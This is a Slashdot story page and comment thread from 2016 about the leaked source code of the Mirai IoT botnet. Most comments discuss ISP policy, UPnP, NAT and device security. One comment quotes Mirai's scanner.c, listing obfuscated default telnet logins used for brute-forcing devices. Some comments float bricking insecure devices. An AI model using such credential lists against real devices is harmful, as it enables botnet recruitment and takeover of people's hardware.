Krebs Warns Source Code Leaked From Massive IoT Botnet Attack (krebsonsecurity.com)

← Back to Stories (view on slashdot.org)

Krebs Warns Source Code Leaked From Massive IoT Botnet Attack (krebsonsecurity.com)

Posted by EditorDavid on Sunday October 2, 2016 @08:41AM from the telnet-botnet dept.

Remember that historically massive denial-of-service attack last month against security researcher Brian Krebs? The source code's just been leaked, Krebs reports, "virtually guaranteeing that the Internet will soon be flooded with attacks from many new botnets powered by insecure routers, IP cameras, digital video recorders and other easily hackable devices." An anonymous Slashdot reader quotes KrebsOnSecurity: The malware, dubbed "Mirai," spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords. Infected systems can be cleaned up by simply rebooting them -- thus wiping the malicious code from memory. But experts say there is so much constant scanning going on for vulnerable systems that vulnerable IoT devices can be re-infected within minutes of a reboot. Only changing the default password protects them from rapidly being reinfected on reboot...

The user who leaked the source code says "there's lots of eyes looking at IOT now... I usually pull max 380K bots from telnet alone. However, after the Krebs DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300K bots, and dropping"...
Now that the source code has been released online for that 620-Gbps attack, Krebs predicts "there will soon be many Internet users complaining to their ISPs about slow Internet speeds as a result of hacked IoT devices on their network hogging all the bandwidth. On the bright side, if that happens it may help to lessen the number of vulnerable systems." He points out that 5.5 million new things get connected to the internet each day, according to Gartner. And they're also predicting that 6.4 billion things will be connected to the internet by the end of the year -- reaching 20.8 billion over the next four years.

69 comments

Min score:

Reason:

Sort:

Throw away economics? by Anonymous Coward · 2016-10-02 08:44 · Score: 1

The throw-away hardware market gave way to the throw-away software (APPS!) market... is this the result?
1. Re:Throw away economics? by Opportunist · 2016-10-02 09:15 · Score: 2
  
  This is more a result of people wanting the latest gadget with the most gimmicks, ignoring security or whether they actually need those gimmicks. This of course leads to manufacturers stuffing more and more gimmicks into their toys, and with the rule that the first to the market makes the buck, security is simply ignored, since the customer does not give a shit about it.
  It's simply market economics at work.
  
  --
  We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
2. Re: Throw away economics? by Anonymous Coward · 2016-10-02 09:20 · Score: 1
  
  As modern app appers know....
3. Re:Throw away economics? by AmiMoJo · 2016-10-02 23:50 · Score: 1
  
  When people buy tech like this they buy the cheapest option. Why pay more for the same functionality? Security is a secondary consideration.
  I like the idea of ISPs scanning for these vulnerabilities and auto-blocking accounts that become infected until the owner contacts them.
  
  --
  const int one = 65536; (Silvermoon, Texture.cs)
  SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
4. Re:Throw away economics? by Opportunist · 2016-10-03 02:36 · Score: 1
  
  What I don't like about this option is what will immediately follow: "If you can scan for bots, you can scan for torrents".
  In the end, we'll get something like that. And this is why we can't have nice things.
  
  --
  We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
5. Re:Throw away economics? by RockDoctor · 2016-10-03 12:57 · Score: 1
  
  When people buy tech like this they buy the cheapest option. Why pay more for the same functionality? Security is a secondary consideration.
  "Security" rates as highly as that? What an optimist you are.
  
  --
  Birds are not dinosaur descendants;birds are dinosaurs, for all useful meanings of "birds", "are" and "dinosaurs"
Overly optimistic by TroII · 2016-10-02 08:51 · Score: 4, Funny

Krebs predicts "there will soon be many Internet users complaining to their ISPs about slow Internet speeds as a result of hacked IoT devices on their network hogging all the bandwidth. On the bright side, if that happens it may help to lessen the number of vulnerable systems."
Yeah, I doubt it.
Customer: My internet is slow.
Comcast: I'm knowing how frustrating that is because I'm being a Comcast customer too! Did you rebooting your modem?
Customer: Yes, my internet is still slow.
Comcast: Let me to be sending the signal to your modem!
Customer: Didn't do anything, my internet is still slow.
Comcast: I'm knowing how frustrating that is because I'm being a Comcast customer too! Did you rebooting your modem?
Customer: Yes, 5 minutes ago while I was talking to you! My internet is still slow.
Comcast: Let me to be sending the signal to your modem!

--
"If there was a gay Afro-Puertorican Linux distribution, I'd give it a try" ~lucm
1. Re: Overly optimistic by Anonymous Coward · 2016-10-02 09:16 · Score: 0
  
  Thanks you to be calling Helpdesk. My name is... Fred.
2. Re:Overly optimistic by Anonymous Coward · 2016-10-02 09:43 · Score: 0
  
  You failed to upsell. Strike one.
3. Re:Overly optimistic by Anonymous Coward · 2016-10-02 09:49 · Score: 3, Informative
  
  Used to work for 2Wire many years ago. Took transfers from outsourced SBC L1 techs. Unlike most, I don't blame them for being insanely inept at their jobs. They're hired to follow a script, not be technicians. Probing for info before the transfer often went like this:
  Me: "Did you try pinging the router?"
  L1: "...I was not able to do that."
  Me: "Ok, is there something wrong? How come you were unable to ping it?"
  L1: "...I was not able to do that."
  I get similar from my cable ISP from non-outsourced support if I call during the day. At night, I assume they have to staff the competent people as there are no others around to fix things. I can say "my modem doesn't sync" without being asked to reboot my computer.
  Sorry, off topic. AC anyhow so unlikely to be seen. :)
4. Re:Overly optimistic by Anonymous Coward · 2016-10-02 13:31 · Score: 0
  
  One benefit of night during prime hours is that you do get better support. Daytime is usually script followers and lower paying positions. Prime time and slightly later are college students or the like and the better paying positions. The reason is that people are more likely to complain on social media during primetime if they miss their favorite show or the actual person who pays the bills is more likely to complain during the later hour than in the middle of the day.
5. Re:Overly optimistic by Anonymous Coward · 2016-10-02 14:05 · Score: 0
  
  LOL have you seen @comcastcares on Twitter?
6. Re:Overly optimistic by Anonymous Coward · 2016-10-02 22:43 · Score: 0
  
  I see you have spoken with my phone company
7. Re:Overly optimistic by Anonymous Coward · 2016-10-04 00:25 · Score: 0
  
  Krebs predicts "there will soon be many Internet users complaining to their ISPs about slow Internet speeds as a result of hacked IoT devices on their network hogging all the bandwidth. On the bright side, if that happens it may help to lessen the number of vulnerable systems."
  Yeah, I doubt it.
  Customer: My internet is slow.
  Comcast: I'm knowing how frustrating that is because I'm being a Comcast customer too! Did you rebooting your modem?
  Customer: Yes, my internet is still slow.
  Comcast: Let me to be sending the signal to your modem!
  Customer: Didn't do anything, my internet is still slow.
  Comcast: I'm knowing how frustrating that is because I'm being a Comcast customer too! Did you rebooting your modem?
  Customer: Yes, 5 minutes ago while I was talking to you! My internet is still slow.
  Comcast: Let me to be sending the signal to your modem!
  You have your own internet?
  I hate this sloppy use of English - you have a fucking internet connection not your own fucking internet!
DDoS by ledow · 2016-10-02 08:58 · Score: 2

No problem.
My old ISP used to detect SMB port access. If they witnessed any - i.e. your connection was opening your file shares to the world - they would block your web and replace every page with a notice until you signed a document stating that you intended to do this. I think you needed customer number so not something that the kids could just press okay on for you.
At that point, they would open up the port again, or - if you'd fixed the problem and they detected that - they'd check once an hour and take the block off.
Force ISPs to do the same for when they detect spam email, or botnet-contribution, etc. Then when they detect it again after they'd signed, you can just kick them off for AUP violation.
But easier - just charge people by the byte. That's what'll end up happening. And most people won't even know or care that they're sending gigabytes to some poor sod's website.
1. Re:DDoS by Anonymous Coward · 2016-10-02 10:31 · Score: 0
  
  will you marry me?
2. Re:DDoS by Anonymous Coward · 2016-10-02 11:07 · Score: 0
  
  But easier - just charge people by the byte. That's what'll end up happening. And most people won't even know or care that they're sending gigabytes to some poor sod's website.
  At least until the poor sod realizes there are people they can sue, and that they have a slam dunk case.
3. Re: DDoS by Anonymous Coward · 2016-10-02 14:54 · Score: 0
  
  Is discriminating against botnet traffic within the net neutrality guidelines?
4. Re:DDoS by Doke · 2016-10-03 04:04 · Score: 1
  
  The problem is from amplification attacks. A sends a dns query (or something) packet to B, but forges a source address of C. B sends a much larger response to C. C blames B. B's internet fee goes up. Both B and C are victims. The correct solution is BPC38, "http://www.bcp38.info/index.php/Main_Page". Unfortunately, a lot of (IMO shady) network operators don't implement restrictions on their clients forging source ip addresses. They might be accepting payment to allow this abuse, they might be incompetent, or they might just be lazy. The excuse that it cost too much to upgrade their gear is no longer relevant. All routers have had the cpu to do that for years.
5. Re: DDoS by Anonymous Coward · 2016-10-03 07:30 · Score: 0
  
  of course not
6. Re:DDoS by Anonymous Coward · 2016-10-03 08:28 · Score: 0
  
  From what I've read this attack did not utilize DNS reflection. This was sheer brute-force.
7. Re:DDoS by davecb · 2016-10-04 00:32 · Score: 1
  
  In various countries, ISPs are reluctant to block spam from their customers, or even tell the customers that they have an virus, for fear the customer will sue them. In Canada (right next to the US) we were advised to do nothing, as one litigatious customer could ruin your whole year (;-))
  
  --
  davecb@spamcop.net
Three Pronged Attack by Anonymous Coward · 2016-10-02 09:08 · Score: 0

1) Fines for device manufactures whose products participate in these attacks
2) Fines for ISPs that allow this traffic
3) Fines for the end users who are too inept to police their equipment
And not little fines.
1. Re:Three Pronged Attack by jabuzz · 2016-10-02 22:35 · Score: 1
  
  I would just go for 1 and for the really bad things like backdoor accounts, fixed known default passwords etc. Then make the fines repeat at double the rate every say three months if they don't fix it.
  At least that way one should in the future be able to buy from big name vendors and have a hope that they are reasonably secure.
2. Re:Three Pronged Attack by Doke · 2016-10-03 04:07 · Score: 1
  
  Unfortunately, by the time the FTC or FCC got the fine through appeals, the bad device would have been on the market for 10 years. By then the sub-company created to market that device would no longer exist. It also would not eliminate the bad devices already out there.
3. Re:Three Pronged Attack by Archangel+Michael · 2016-10-03 04:27 · Score: 1
  
  1) Defeated by bankruptcy
  2) Defeated by lobbying
  3) Blood from turnips. Good luck with that.
  Good luck with that. The problem is, these types of events are easily solvable, except the part where solving it requires cooperation. The whole "That's Not My Problem" response by just about everyone.The problem is, it is everyone's problem because just about everyone contributes to it. There is one almost IoT device for every person on earth already.
  The biggest problem with IoT devices is that they are mostly replacing devices that are infrastructure (long lasting) devices that don't have to be updated, upgraded or patched, so nobody is thinking about the long term consequences of having to replace that thermostat every 3 years because it has expired support. I suspect that once you include the regular cost of replacing said device every couple years, the novelty of having a "smart thermostat" will wear off and the smart people will go back to regular unplugged thermostat, because the inconvenience of long term support isn't worth the convenience of having your heating and cooling by remote control.
  The smart apps on my TV are useless.
  Your thermostat has been hacked.
  IMHO the IoT is a bust already, and it hasn't even got off the ground yet.
  
  --
  Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
Blame by Anonymous Coward · 2016-10-02 09:12 · Score: 0

I blame Russians, nuclear power, trans fats, and gluten.
It's not "cleaning up", it's competition by Opportunist · 2016-10-02 09:12 · Score: 3, Interesting

The reason you can't simply get as many bots isn't that ISPs start finding out that they have a responsibility. It's simply that more players are fighting over the bots.
Next step is probably botters hacking devices and changing the passwords so other bot herders can't use them. It's the usual game: A resource is only valuable if the other one does NOT have it.

--
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
Good! by dromgodis · 2016-10-02 09:26 · Score: 2

Am I thinking wrong, or isn't this potentially a good thing? The more DOS:ers fighting for the same bots, the fewer of them will be able to hit each site. Thus they won't really be effective any longer.
1. Re: Good! by Anonymous Coward · 2016-10-02 10:24 · Score: 0
  
  I'm sure they'll work out some kind of time share scheme.
2. Re:Good! by arglebargle_xiv · 2016-10-02 16:39 · Score: 1
  
  It's more of a nothing thing at the moment, this freely-available source code doesn't seem to be available anywhere. I was curious to see what the code was like, but it's not available anywhere I can see...
see what happens when you... by Anonymous Coward · 2016-10-02 09:27 · Score: 0

give away control of the internet?
1. Re:see what happens when you... by Anonymous Coward · 2016-10-02 16:44 · Score: 0
  
  I see from your post what happens when you go full retard.
"Mirai" by SeaFox · 2016-10-02 09:34 · Score: 2

Krebs reports, "virtually guaranteeing that the Internet will soon be flooded with attacks from many new botnets powered by insecure routers, IP cameras, digital video recorders and other easily hackable devices."
A frightening "future" indeed.
1. Re:"Mirai" by jargonburn · 2016-10-02 09:48 · Score: 1
  
  Ha, nice! I wasn't actually thinking about what the name meant.
Have the actual IoT devices been identified? by slincolne · 2016-10-02 09:42 · Score: 3, Interesting

Has anyone seen any lists of the devices that are being compromised?
It would be really handy to know what devices are actually at risk, so that people can tell if they need to take action. It sounds like whatever these devices are, they have somehow been exposed to the Internet (didn't we all disable UPNP years ago).
Maybe all the ISP's should grab a copy of the code and use it for scanning for vulnerable client devices and tell their customers to disconnect them before the ISP does it for them.
1. Re:Have the actual IoT devices been identified? by gbjbaanb · 2016-10-02 22:40 · Score: 2
  
  probably all of them, sooner or later. The IoT software built into nearly everything will be done as a marketing gimmick more than anything, with both cost and ease-of-usage kept down as low as possible meaning security will be non-existent, or if it is present will be so dumbed down to make it work out-of-the-box without any configuration.
2. Re:Have the actual IoT devices been identified? by Fnord666 · 2016-10-03 03:39 · Score: 1
  
  It would be really handy to know what devices are actually at risk, so that people can tell if they need to take action. It sounds like whatever these devices are, they have somehow been exposed to the Internet (didn't we all disable UPNP years ago).
  I haven't seen the source code yet, but here is an interesting article that discusses at least some of the participants.
  
  --
  'The tyrant will always find pretext for his tyranny.' - Aesop's Fables
Appernet of Apps! by Anonymous Coward · 2016-10-02 09:46 · Score: 0

ONLY apps can app apps, and with the Appernet of Apps, modern can app even more apps while apping other apps! With LUDDITE software like LUDDITE Windows 7, you can only run one LUDDITE program at a time!

Apps!
Auto-Disonnect by ISPs? by BoRegardless · 2016-10-02 10:08 · Score: 1

When is the whole www going to implement a system to disconnect items on the last leg of an internet connection when misbehavior occurs?
If 100 users get disconnected and 99 all pounce on the guy responsible for having a Bot-IOT device.
At least I can dream.
1. Re:Auto-Disonnect by ISPs? by Anonymous Coward · 2016-10-02 11:52 · Score: 0
  
  But it's so HAAAAARRRRD. And ignoring the problem and waving our hands and blaming it on nation state gremlins is so EEAAAASSSSYYYYY.
  And what you should really be saying is - "If one subscriber's 100 devices get disconnected, then the lack of utility of the 99 still working ones will motivate the lazy cheapskate to get off their ass and press the off button on the defective device. And if ten thousand lazy cheapskates all face this situation, two or three will make some noise and shame the defective device manufacturer into taking the most trivial steps (step#1, here is the source code customer, fix it yourself, you'll be fucking amazed at how possible this is with countless global tech forums available to you) to fix the known defective and harmful to the network device.
2. Re:Auto-Disonnect by ISPs? by Zontar+The+Mindless · 2016-10-02 16:46 · Score: 2
  
  What's "misbehaviour"?
  
  --
  Il n'y a pas de Planet B.
torrent? by Anonymous Coward · 2016-10-02 10:49 · Score: 0

Well? Where is the source, luke?
time to brick them? by Gravis+Zero · 2016-10-02 11:09 · Score: 3, Interesting

So is it time for people to start bricking every unsecured IoT device or what?

--
Anons need not reply. Questions end with a question mark.
1. Re:time to brick them? by BoRegardless · 2016-10-02 13:45 · Score: 1
  
  VERY Interesting: If an automated BOT went around and commandeered unsecured IOT devices and simply destroyed them, that would solve one problem. People would quickly learn to secure their IOT devices.
2. Re:time to brick them? by dargaud · 2016-10-02 19:38 · Score: 1
  
  I think most IOT is hard to brick: if you reboot it it just restart in default mode as there's no writable filesystem (only a ramdisk) and only a few bytes where to save config information. So you are back to square one with a device still ripe open and ready for the ownage.
  
  --
  Non-Linux Penguins ?
3. Re:time to brick them? by Doke · 2016-10-03 04:09 · Score: 1
  
  Then get sued... :-(
4. Re: time to brick them? by Anonymous Coward · 2016-10-03 06:28 · Score: 0
  
  Nvram can easily be fucked.
BCP38 by mars-nl · 2016-10-02 11:37 · Score: 3, Interesting

Wouldn't most if not all DDoS attacks be much harder if ISPs implemented BCP38? Of course IoT devices should be secure, but this is a dream as software will always contain bugs. The number of ISPs is much smaller than the number of devices connected to the internet, so blocking spoofed IP traffic is much cheaper solution.
1. Re:BCP38 by ShaunC · 2016-10-02 13:21 · Score: 2
  
  Some of the traditional attacks (DNS/NTP reflection and amplification) would be mitigated but it's not likely to help with these IoT DDoSes. When you can control 300,000 pwned devices, you don't need to spoof any traffic.
  
  --
  Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
2. Re:BCP38 by I4ko · 2016-10-02 18:23 · Score: 1
  
  In my case I have a set of rules on my router - you send me a packet I don't expect - blacklisted for 1 hour.
  You send me another packet - add another hour to your blacklist time. I have a few IP cameras - they are allowed to connect only to my internal DNS and to my external ftp server. All connections to them, and outbound from them to places I have not explicitly allowed are dropped silently.
  Same for NAS-es as well - no, you can't use UPNP, you can't phone home to mama(facturer), and you most certainly can't get any connection from the outside world. The WD devices are horrible and next to be hacked - they open an openvpn connection and drop untrusted traffic right in your network.. clickety click - no more traffic.
3. Re:BCP38 by Anonymous Coward · 2016-10-03 01:35 · Score: 0
  
  Thanks, I will forward this information to my Grandma.
4. Re:BCP38 by Anonymous Coward · 2016-10-03 04:11 · Score: 0
  
  Here's an idea - how about not thinking that every single freakin' device needs to be "internet enabled"! Seriously, it is marketing hype and people need to stop falling for it. You do *not* need your thermostat to be internet enabled. You do *not* need your car to be internet enabled. It is all pointless over-engineering meant to drive up price points and try to get people to buy things that they do not need. Furthermore, this pointless over engineering *decreases* reliability and the same time that it is pointlessly increasing cost. Stop being such drones and things would be so much better.
5. Re:BCP38 by Doke · 2016-10-03 04:11 · Score: 1
  
  Regrettably, this is true. Krebs said his Akamai protection got hit primarly by GRE packets straight from the botted device. Very little of the DDOS was from amplification.
You don't want this. by waspleg · 2016-10-02 12:30 · Score: 1

Slippery slope. Very slippery. Oh look the ??AA just lobbied to get torrents listed as malware traffic legally and now ISPs are required to go around policing which is what the shit lord copyright trolls have always wanted.
He got Slashdotted ! by Laxator2 · 2016-10-02 20:57 · Score: 1

In the past this used to be a good thing indeed,
but by now everyone seems to have forgotten the Slashdot Effect:
https://en.wikipedia.org/wiki/...
I am getting old ...
Which Devices? by Anonymous Coward · 2016-10-03 00:24 · Score: 0

I don't see it as very helpful to announce these malwares and then issue hand waving generalities about 300,000 infected devices without ever mentioning which devices are being infected.
I realize that he explains that it is devices such as video cameras with default credentials, but I very much doubt that it is all that large a group of manufacturers/products. My suspicion is that, despite it being a very large number of devices(bots), it is a small group of manufacturers/products, and knowing which ones would be very helpful.
So, who/what makes up the botnet? Is it Hikvision, Panasonic, Ubiquiti? This, to me is the more important detail.
1. Re:Which Devices? by Doke · 2016-10-03 04:13 · Score: 1
  
  I've heard that mentioning specific vendors and models can get a security researcher sued. These days, you need to either post the list of weak devices anonymously, or consult a lawyer about responsible disclosure.
NAT? by Anonymous Coward · 2016-10-03 01:34 · Score: 0

Does this scanning for IoT devices bypass NAT somehow? If my router isn't hacked, my internal devices should be safe from scanning?
How to protect myself? by ripvlan · 2016-10-03 02:40 · Score: 2

I've been trying to get more info on this IoT unsecure thing and understand what these devices are. One thing that confuses me is that - aren't these things installed (mostly) in Residential Homes? which would be behind a "firewall" router that (usually) uses NAT?
The reason I ask this - how do I protect myself if I place such a device in my home? Are these pwned devices on the open network --- or can they be attacked through NAT? My "smart" TV, Bluray, Amazon TV, Apple TV, Raspberry Pi, Sonos, etc are all on the network. I have a NAT w/ uPNP disabled (prevent holes from being poked). Sure I understand there are ways through NAT....but these IoT attacks seem to "telnet" directly to the device without any special layers.
Beyond basic NAT/uPNP --- what else do I need to know?
Thanks!
1. Re: How to protect myself? by mbeckman · 2016-10-03 03:30 · Score: 2
  
  uPNP is the culprit in most cases. It lets IOT devices unilaterally open holes in firewalls. The thing is, there is no reason to do so, as IoT devices should only need to "phone home", which doesn't require inbound access. The second vector is viruses that invade a home user's desktop computer, and then scan for, and infect, IoT devices. This is much harder to protect against, as ISPs can't scan through the firewall. What would be helpful is a downloadable tool to let users run their own IoT vulnerability assessment. I notice that commercial tools, such as Nessus, still haven't woken up to this threat.
2. Re:How to protect myself? by Anonymous Coward · 2016-10-03 03:38 · Score: 0
  
  Holes can be punched in the NAT (NAT-PMP, STUN, etc), but device has to do it itself. i think what these guys do, they scan for open port 23, and 2323 and maybe even 23023? or maybe have a script in some ad rotation network, that connects FROM your browser TO your gateway at port 23, and accesses it from there with some default passwords? Javascript is evil =)
3. Re:How to protect myself? by Anonymous Coward · 2016-10-03 04:25 · Score: 0
  
  Change default passwords is one huge thing most people don't do.
4. Re:How to protect myself? by Doke · 2016-10-03 04:28 · Score: 1
  
  Most consumer grade gateways are designed for less technical users. To reduce support calls, they have UPNP turned on by default. These days, they usually have an option to turn it off, probably down in an "advanced" page of the WUI. However, they very seldom have options to limit it to specific internal devices. Many of the online games require open network ports, and use UPNP to obtain them. Technical users can manually set up the port forwarding for a game console, by assigning it a fixed ip, and passing the required ports. However, the majority of users can't do that, or are too lazy. The few users who turn UPNP off, often end up turning it back on to get the games to work correctly. At that point, all of the IoT devices can create their telnet backdoor UPNP exceptions too.
  Another method is a downloaded trojan on a PC, that infects IoT thing on the local network.
Re:What I'd like to see by Archangel+Michael · 2016-10-03 04:29 · Score: 1

You'd be dead too. ;)

--
Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
I've Heard by Anonymous Coward · 2016-10-03 05:21 · Score: 0

I've heard that you're a raging homosexual. But, that doesn't mean that its true.
Printing facts, such as, the malware targets devices made by Hikuiti gets no one sued. It would be an irrefutable statement of fact.
From scanner.c by Anonymous Coward · 2016-10-03 06:56 · Score: 0

Scanner runs through the following list of default login/passwords. // Set up passwords add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511 add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888 add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456 add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321 add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none) add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345 add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3); // user user add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3); // admin (none) add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3); // root pass add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3);
Easy to solve by Anonymous Coward · 2016-10-04 16:08 · Score: 0

Arm the providers with detection software and they can block the ip. Provider stores the blocked ip to a customer and informs them of the vulnerability and the cause, potentially even walks them through the fix. Everyone wins!